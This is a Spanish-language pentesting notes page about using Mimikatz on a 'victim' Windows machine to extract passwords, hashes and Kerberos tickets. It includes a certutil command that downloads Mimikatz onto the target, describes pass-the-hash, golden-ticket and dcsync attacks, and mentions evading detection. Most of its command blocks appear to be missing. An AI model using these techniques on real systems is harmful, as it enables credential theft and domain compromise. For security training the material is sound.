Mimikatz

Windows Privilege Escalation

Mimikatz es una herramienta de código abierto para Windows utilizada en ciberseguridad que puede extraer credenciales de autenticación, como contraseñas, hashes, PIN y tickets de Kerberos, de la memoria de los sistemas. Fue creada en 2007 por el investigador de seguridad francés Benjamin Delpy para demostrar vulnerabilidades en los protocolos de autenticación de Microsoft.

mimikatz empezó como ejemplo para explotar una vulnerabilidad en windows encontrada por el creador Benjamin Delpy, esta vulnerabilidad que guardaba una copia encriptada de la password y una llave que podía usarse para descifrarla a la vez en la memoria. ahora utiliza varias técnicas y vulnerabilidades diferentes para extraer credenciales, entre otros.

que podemos explotar con mimikatz:

  • Pass-The-Hash

  • Pass-The-Ticket

  • Pass-The-Cache

  • Overpass-the-hash

  • Golden y Silver ticket attacks

  • etc.

Instalación de mimikatz

primer debemos saber que mimikatz tiene ciertos requisitos:

  • instalarlo en el equipo victima

  • tener privilegios administrativos (como mínimo)

de igual manera, si el equipo cuenta con medidas de seguridad la detección será rápida a menos de que el atacante aplique técnicas de evasión

ya sabiendo esto, iniciemos la instalación

# instalar desde CMD
certutil -urlcache -split -f "https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip" mimikatz.zip

puedes verificar la versión mas reciente de mimikatz dando click aquíarrow-up-right

Uso de mimkatz

Ejecución de mimikatz

  • recordemos que no solo requiere administrador, si para muchas funciones pero para algunas operaciones requieren privilegios SYSTEM o dumpear lsass.exe (minidump), además podemos ser fácilmente detectados si la maquina victima cuenta con medidas de seguridad y no aplicamos evasión. si ciertos comandos contra LSASS u otros no funciona es porque debemos iniciar haciendo un minidump de lsass.exe con privilegio SYSTEM

Verificar privilegios

al iniciar el programa lo primero que debemos hacer es verificar nuestros privilegios:

el output esperado es:

si de lo contrario vemos un error significa que necesitamos tener mas privilegios en la maquina victima.

Comandos y módulos

Mimikatz está organizado en módulos que permiten realizar diferentes acciones. Los modulos mas importantes son:

  • sekurlsa: Este módulo es el principal utilizado para extraer credenciales de LSASS.

  • kerberos: Permite interactuar con el subsistema Kerberos de Windows, incluyendo la extracción e inyección de tickets.

  • lsadump: Este módulo se utiliza para interactuar con la Base de Datos de la Autoridad de Seguridad Local (LSA), incluyendo la extracción de hashes NTLM.

circle-info

mimikatz cuenta con demasiados módulos, algunos de los demás módulos de mimikatz son:

en mimikatz los comandos se estructuran de una manera un tanto mas única:

Autenticación y credenciales (sekurlsa)

Gestión de Tickets Kerberos (kerberos)

Trabajo con Certificados y claves (crypto)

circle-info

Las claves CNG (Cryptography API: Next Generation) sirven para el almacenamiento y la recuperación seguros de claves criptográficas en sistemas operativos Windows.

Las "claves CAPI" en Windows se refieren a la Interfaz de Programación de Aplicaciones Criptográficas (CryptoAPI), un conjunto de bibliotecas que permiten a los desarrolladores añadir funciones de seguridad como el cifrado y la firma digital a sus aplicaciones.

Secrets LSA (lsadump)

lsadump::dcsync sólo funcionará si el principal tiene permisos de replicación (Domain Admins, Enterprise Admins o cuentas con DS-Replication) de lo contrario devolverá errores.

Gestión de tokens de autenticación

Gestión de procesos en memoria (process)

Trabajo con Windows Vault

circle-info

Windows Vault es un area de almacenamiento protegido dentro del sistema operativo Windows que guarda secretos, contraseñas y otra información personal.

Misceláneo (misc)


Last updated